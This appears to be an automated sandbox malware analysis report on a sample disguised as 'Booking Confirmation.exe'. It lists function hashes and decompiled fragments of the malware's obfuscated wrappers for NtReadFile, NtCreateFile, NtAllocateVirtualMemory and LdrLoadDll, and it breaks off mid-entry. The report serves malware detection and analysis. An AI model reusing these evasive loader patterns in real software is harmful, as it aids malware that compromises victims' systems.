Source File: 00000000.00000002.670938392.0000000002470000.00000040.00000001.sdmp, Offset: 02470000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 557883a0ce81b73950ce55ccb72aa91a525d1f70889ac696fc49f9c054ae44b0
Instruction ID: 6f0aa336226cbc6220378ea85a2fa06ef2b39a403c7e6cc49919e53ffbf9d5d1
Opcode Fuzzy Hash: 557883a0ce81b73950ce55ccb72aa91a525d1f70889ac696fc49f9c054ae44b0
Instruction Fuzzy Hash: F271F270A00B059FD724DF2AC54479AB7F1FF88308F00892ED59AD7B50DB75A94A8F91

Uniqueness

Uniqueness Score: -1.00%

Function 0247B213, Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0247DD8A

Memory Dump Source

Source File: 00000000.00000002.670938392.0000000002470000.00000040.00000001.sdmp, Offset: 02470000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4779ea40d1b3e268a8de91ebe3c1b59d01addc6d792b803b6d18722f6bdbcd7e
Instruction ID: cdc9056be55ca82aef62ba18ee6702b576f14f8064b06b006d8a0cc72a4d8c88
Opcode Fuzzy Hash: 4779ea40d1b3e268a8de91ebe3c1b59d01addc6d792b803b6d18722f6bdbcd7e
Instruction Fuzzy Hash: C551B1B1D10319DFDB14CFA9C984ADEBBB5BF49314F24812AE419AB210D7749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0247B214, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0247DD8A

Memory Dump Source

Source File: 00000000.00000002.670938392.0000000002470000.00000040.00000001.sdmp, Offset: 02470000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 9d9048316c7e843fff2866848b2d1329333f27230408994643a61e7127beec45
Instruction ID: e57683bef8993b37c9629e0915ae6aaa70b30c87693de167b1611a230216c228
Opcode Fuzzy Hash: 9d9048316c7e843fff2866848b2d1329333f27230408994643a61e7127beec45
Instruction Fuzzy Hash: 3851A2B1D10319DFDF14CFA9C984ADEBBB5BF48314F24812AE419AB210D7749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0247DC77, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0247DD8A

Memory Dump Source

Source File: 00000000.00000002.670938392.0000000002470000.00000040.00000001.sdmp, Offset: 02470000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: bc99b5dc8a8bcb1dbbcf0fd4ed81ba8d6893266d576d11968d624986824a89bd
Instruction ID: ac5b4a5d9b091840469cad9db5c6c4a2a4d8935092aac5c34df13d0a5ce53603
Opcode Fuzzy Hash: bc99b5dc8a8bcb1dbbcf0fd4ed81ba8d6893266d576d11968d624986824a89bd
Instruction Fuzzy Hash: C141B2B1D10319DFDF14CFA9C884ADEBBB5BF48314F24812AE419AB210D7749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02475864, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02476D86,?,?,?,?,?), ref: 02476E47

Memory Dump Source

Source File: 00000000.00000002.670938392.0000000002470000.00000040.00000001.sdmp, Offset: 02470000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: be9d1e90c152df8c75aee76d791388fc23df2504b42c0e13cf93ac204699b5e0
Instruction ID: 87d9c8124e8551e6ea87e7fe94ccb941b15b41e75917bd8c9b96f81077388ab8
Opcode Fuzzy Hash: be9d1e90c152df8c75aee76d791388fc23df2504b42c0e13cf93ac204699b5e0
Instruction Fuzzy Hash: D721E4B5900208AFDB10CFAAD984BDEBBF9FB48324F14845AE914B7351D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02476DB9, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02476D86,?,?,?,?,?), ref: 02476E47

Memory Dump Source

Source File: 00000000.00000002.670938392.0000000002470000.00000040.00000001.sdmp, Offset: 02470000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 949557af125f59da83eb88608c82f3ca7056f3f095298a1797da9c4d423ab8db
Instruction ID: fe40604a535dccc85121d549c6a42e1dd97423586de22d5b9b4e975cde20226e
Opcode Fuzzy Hash: 949557af125f59da83eb88608c82f3ca7056f3f095298a1797da9c4d423ab8db
Instruction Fuzzy Hash: 4021C6B5D01209AFDB10CF9AD984BDEBBF9EB48324F14841AE915B7310D374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0247B0D8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0247BE89,00000800,00000000,00000000), ref: 0247C09A

Memory Dump Source

Source File: 00000000.00000002.670938392.0000000002470000.00000040.00000001.sdmp, Offset: 02470000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b0110d6dd78196fbac4303800ec11ac542c595066ca73cff55d5e3bdf54fab62
Instruction ID: 51e52e3dcf0f52611ef2c516b4f95dc0cb13ec9dad843754ca4932022b7b6de6
Opcode Fuzzy Hash: b0110d6dd78196fbac4303800ec11ac542c595066ca73cff55d5e3bdf54fab62
Instruction Fuzzy Hash: 711103B69002489FDB14CF9AC484BDEBBF4EB48324F04852AE525B7700C375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0247C028, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0247BE89,00000800,00000000,00000000), ref: 0247C09A

Memory Dump Source

Source File: 00000000.00000002.670938392.0000000002470000.00000040.00000001.sdmp, Offset: 02470000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 55450fa78172fb3f5fa47bad09148924588898a418655ed2ee21fda1836535cc
Instruction ID: ff187540d66615721ebfe6296e64ac1818c1cc2e1591a856ec89a824febf87fb
Opcode Fuzzy Hash: 55450fa78172fb3f5fa47bad09148924588898a418655ed2ee21fda1836535cc
Instruction Fuzzy Hash: FD1144B68002099FDB10CF9AC484BDEFBF4AB48324F04852AD825B7300C375A549CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0247B080, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0247BBDB), ref: 0247BE0E

Memory Dump Source

Source File: 00000000.00000002.670938392.0000000002470000.00000040.00000001.sdmp, Offset: 02470000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d695ecbd24dc4cf45364fd3dc6db89ec6b18e5bfd1f03c4a54ac2c7dd199adb1
Instruction ID: dfc0de73fbfd6a688da3a85c8ba05ec26b0a2096402e5021c2001ce59bcfd6d0
Opcode Fuzzy Hash: d695ecbd24dc4cf45364fd3dc6db89ec6b18e5bfd1f03c4a54ac2c7dd199adb1
Instruction Fuzzy Hash: 0911EFB69006498FDB10CF9AC444BDAFBF4EB88328F14856AD929A7700C374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0247B24C, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0247DEA8,?,?,?,?), ref: 0247DF1D

Memory Dump Source

Source File: 00000000.00000002.670938392.0000000002470000.00000040.00000001.sdmp, Offset: 02470000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 47a6b935062eb0e7addd1d19b868e8d9adab2def500c8060d8dc064d5e3c3fc8
Instruction ID: cfeb2bac3dd6fb9c3c6918570622968618d5aad94cdfa42f51cabd9b7b8f122a
Opcode Fuzzy Hash: 47a6b935062eb0e7addd1d19b868e8d9adab2def500c8060d8dc064d5e3c3fc8
Instruction Fuzzy Hash: D611E0B59002089FDB10DF99D584BDEBBF8EB48324F14855AE925B7700C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0247DEBF, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0247DEA8,?,?,?,?), ref: 0247DF1D

Memory Dump Source

Source File: 00000000.00000002.670938392.0000000002470000.00000040.00000001.sdmp, Offset: 02470000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: b8609f49f9fab04fd94f3f801b719ce97fb50dfa15983c1d0f334444c24de260
Instruction ID: 1c332181b3ca5c99454581c4f17adcb7f33fd7c7672b5640cee6a3e007bb25c3
Opcode Fuzzy Hash: b8609f49f9fab04fd94f3f801b719ce97fb50dfa15983c1d0f334444c24de260
Instruction Fuzzy Hash: 471100B58002089FDB10CF99D584BDEBBF8EB48324F14851AE929A7700C374AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0247C2B0, Relevance: .5, Instructions: 522COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.670938392.0000000002470000.00000040.00000001.sdmp, Offset: 02470000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc9fb55265419d999772c93e0563079b6bb8a1e727da9feeaa5b1767af2122e3
Instruction ID: ec5e58d6bb2d0220e90faaf1c0b895cd4ae43fe9348a11e8f79304c857ea0107
Opcode Fuzzy Hash: bc9fb55265419d999772c93e0563079b6bb8a1e727da9feeaa5b1767af2122e3
Instruction Fuzzy Hash: 425239B1502706EBD720CF54E8C82997BA1FB6432AB91421BD1615BE90D3BC6DCBCF64

Uniqueness

Uniqueness Score: -1.00%

Function 02479990, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.670938392.0000000002470000.00000040.00000001.sdmp, Offset: 02470000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35f24c63b661888a35140daef38f8285be1b4c205f14e9a1f0be90afd0393184
Instruction ID: 0379254f925430549a7cda8356cb2f2b4a990970f431d34f83e39f390612003b
Opcode Fuzzy Hash: 35f24c63b661888a35140daef38f8285be1b4c205f14e9a1f0be90afd0393184
Instruction Fuzzy Hash: 07A18C32E006198FCF05DFA5C8445DEBBB2FF89304B15856BE815BB220EB31A946CF40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Booking Confirmation.exe PID: 612 Parent PID: 7100 Booking Confirmation.exeCOMMON

Executed Functions

Function 00419DB2, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 74
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419DB2(void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44) {
				char _v1;
				char* _t59;

				asm("rcl dword [ebx+0x5f], 0xe3");
				_t59 =  &_v1;
				if (_t59 == 0) goto L3;
				_push(_t59);
			}

0x00419db9
0x00419dbe
0x00419dbf
0x00419dc0

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55

Strings

HA, xrefs: 00419DDC, 00419DE8
BMA, xrefs: 00419E32, 00419E40
BMA, xrefs: 00419E4D, 00419E54

Memory Dump Source

Source File: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA$HA
API String ID: 2738559852-181183267
Opcode ID: 4a48234139a544930bac8349fa1b23d1940cfe565be2520cc49e0ad9496b62c9
Instruction ID: 3e3ee1d868dada5ff74454793b5848170191f3d98e1e270987646d6814ebfa3b
Opcode Fuzzy Hash: 4a48234139a544930bac8349fa1b23d1940cfe565be2520cc49e0ad9496b62c9
Instruction Fuzzy Hash: 6921F9B6200108AFCB14DF99DC84EEB77A9EF8C714F158649BE1DA7241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419E0A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00419E0A(void* __edx, void* __edi, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				intOrPtr _v0;
				intOrPtr _t14;
				void* _t19;
				void* _t31;
				intOrPtr* _t32;
				void* _t34;

				asm("xlatb");
				 *((char*)(__edi + 0x1a)) = 0x55;
				_t14 = _v0;
				_t4 = _t14 + 0xc48; // 0x656dec15
				_t32 = _t4;
				E0041A960(__edi, _t14, _t32,  *((intOrPtr*)(_t14 + 0x10)), 0, 0x2a);
				_t7 =  &_a32; // 0x414d42
				_t13 =  &_a8; // 0x414d42
				_t19 =  *((intOrPtr*)( *_t32))( *_t13, _a12, _a16, _a20, _a24, _a28,  *_t7, _a36, _a40, _t31, _t34, __edi); // executed
				return _t19;
			}

0x00419e0a
0x00419e0d
0x00419e13
0x00419e1f
0x00419e1f
0x00419e27
0x00419e32
0x00419e4d
0x00419e55
0x00419e59

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55

Strings

BMA, xrefs: 00419E32, 00419E40
BMA, xrefs: 00419E4D, 00419E54

Memory Dump Source

Source File: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: 9e717505c25a82cf4042bc2022fb971966de747259fbd9569fded4c9e304951c
Instruction ID: aa9b5b214718aa6ebfe1a9c89e5d6a711ddeb18a2471c7d830735e57fc1e90b3
Opcode Fuzzy Hash: 9e717505c25a82cf4042bc2022fb971966de747259fbd9569fded4c9e304951c
Instruction Fuzzy Hash: AAF0E7B2214608ABCB14DF89DC80EEB77A9EF8C754F058649FA1D97241D630E9518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				intOrPtr _t13;
				void* _t18;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t13 = _a4;
				_t3 = _t13 + 0xc48; // 0x656dec15
				_t29 = _t3;
				E0041A960(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t28); // executed
				return _t18;
			}

0x00419e13
0x00419e1f
0x00419e1f
0x00419e27
0x00419e32
0x00419e4d
0x00419e55
0x00419e59

APIs

NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55

Strings

BMA, xrefs: 00419E32, 00419E40
BMA, xrefs: 00419E4D, 00419E54

Memory Dump Source

Source File: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: BMA$BMA
API String ID: 2738559852-2163208940
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACD0(void* __ebx, void* __edi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t32;
				void* _t33;
				void* _t34;

				_v8 =  &_v536;
				_t15 = E0041C650(_a8,  &_v12, 0x104, _a8);
				_t33 = _t32 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA70(__eflags, _v8);
					_t34 = _t33 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCF0(__ebx, __edi,  &_v12, 0);
						_t34 = _t34 + 8;
					}
					_t18 = E0041AEA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acec
0x0040acef
0x0040acf4
0x0040acf9
0x0040ad03
0x0040ad08
0x0040ad0b
0x0040ad0d
0x0040ad15
0x0040ad1a
0x0040ad1a
0x0040ad21
0x0040ad29
0x0040ad2c
0x0040ad2e
0x0040ad42
0x00000000
0x0040ad44
0x0040ad4a
0x0040acfe
0x0040acfe
0x0040acfe

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42

Memory Dump Source

Source File: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96

Uniqueness

Uniqueness Score: -1.00%

Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				asm("in al, dx");
				_t15 = _a4;
				_t3 = _t15 + 0xc40; // 0xc40
				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00419d62
0x00419d63
0x00419d6f
0x00419d77
0x00419dad
0x00419db1

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419D62, Relevance: 1.5, APIs: 1, Instructions: 39
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00419D62() {
				long _t21;
				void* _t31;
				void* _t35;

				asm("in al, dx");
				_t15 =  *((intOrPtr*)(_t35 + 8));
				_t3 = _t15 + 0xc40; // 0xc40
				E0041A960(_t31,  *((intOrPtr*)(_t35 + 8)), _t3,  *((intOrPtr*)( *((intOrPtr*)(_t35 + 8)) + 0x10)), 0, 0x28);
				_t21 = NtCreateFile( *(_t35 + 0xc),  *(_t35 + 0x10),  *(_t35 + 0x14),  *(_t35 + 0x18),  *(_t35 + 0x1c),  *(_t35 + 0x20),  *(_t35 + 0x24),  *(_t35 + 0x28),  *(_t35 + 0x2c),  *(_t35 + 0x30),  *(_t35 + 0x34)); // executed
				return _t21;
			}

0x00419d62
0x00419d63
0x00419d6f
0x00419d77
0x00419dad
0x00419db1

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e14685e1336d3e8bedad5cc8f4a0513404ab599c5713b13c8e7169f06608a5db
Instruction ID: f9e75046ee5429152fd383a0d0cfac4a474c827aa4cf025705bab887161fcd11
Opcode Fuzzy Hash: e14685e1336d3e8bedad5cc8f4a0513404ab599c5713b13c8e7169f06608a5db
Instruction Fuzzy Hash: 04F0CAB2201108AFCB08CF88DC84EEB37A9EF8C754F158248FA0DE7240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419D1C, Relevance: 1.5, APIs: 1, Instructions: 31
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00419D1C(void* __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40, long _a44, void* _a48, long _a52) {
				long _t27;
				void* _t46;
				void* _t47;
				intOrPtr* _t49;
				void* _t51;

				if(__eflags != 0) {
					_t27 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
					return _t27;
				} else {
					asm("movsb");
					_t28 = _a4;
					_t4 = _t28 + 0xc3c; // 0xc64
					_t49 = _t4;
					E0041A960(_t46, _a4, _t49,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x27);
					return  *((intOrPtr*)( *_t49))(_a8, _a12, _a16, _a20, _a24, _t47, _t51);
				}
			}

0x00419d1d
0x00419dad
0x00419db1
0x00419d1f
0x00419d1f
0x00419d23
0x00419d2f
0x00419d2f
0x00419d37
0x00419d59
0x00419d59

APIs

NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD

Memory Dump Source

Source File: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7d1d0dd45730a3cab19d534196467145361a0f767e4c637b4ebc2c5e092f58ac
Instruction ID: 9cd4676ba9c6a89dab0461fb7f4c452788ef1dc7d528fcf3db7cd70acc4c4bbd
Opcode Fuzzy Hash: 7d1d0dd45730a3cab19d534196467145361a0f767e4c637b4ebc2c5e092f58ac
Instruction Fuzzy Hash: A7F092B2204009AF8B48CF8CDC91CEB73FAAF8C744B118208FA0DD3240D630EC518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x00419f4f
0x00419f57
0x00419f79
0x00419f7d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79

Memory Dump Source

Source File: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419E90(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00419e93
0x00419e96
0x00419e9f
0x00419ea7
0x00419eb5
0x00419eb9

APIs

NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5

Memory Dump Source

Source File: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0

Uniqueness

Uniqueness Score: -1.00%

Function 018A99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018A99AA

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 98eda78bfd936269705c32efd1b0d95293955e86b44c610763442b97243f8498
Instruction ID: 7afa675b673b02d9c10c5c7b4a469065edba728a942a68cd6362ae0009e7cae1
Opcode Fuzzy Hash: 98eda78bfd936269705c32efd1b0d95293955e86b44c610763442b97243f8498
Instruction Fuzzy Hash: 1E9002A134100453D14061994464B460005E7E1345F51C125E2158674DC659DD567166

Uniqueness

Uniqueness Score: -1.00%

Function 018A9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018A991A

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c52536cf283208c1a845e18e1f73adad6e7e8cfce60f78079f49712784bd2292
Instruction ID: 2b65a43f706a4fd0f9a7262510380348815cd2398b9890791968c21485801c85
Opcode Fuzzy Hash: c52536cf283208c1a845e18e1f73adad6e7e8cfce60f78079f49712784bd2292
Instruction Fuzzy Hash: C99002B120100413D180719944547860005E7D0345F51C121A6158674EC6999ED976A5

Uniqueness

Uniqueness Score: -1.00%

Function 018A98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 018A98FA

Memory Dump Source

Source File: 00000005.00000002.710205627.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3b486e0c29b75e9be304e1266b7ae07f61ec9e259499b749277acefe1487cc5f
Instruction ID: 42deec972da2c15f8d4f897b7fe6ef20481a147d1f0176cd9953c093ed020c97
Opcode Fuzzy Hash: 3b486e0c29b75e9be304e1266b7ae07f61ec9e259499b749277acefe1487cc5f
Instruction Fuzzy Hash: 5790026160100513D14171994454656000AE7D0385F91C132A2118675ECA659A96B171

Uniqueness

Uniqueness Score: -1.00%

Function 018A9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

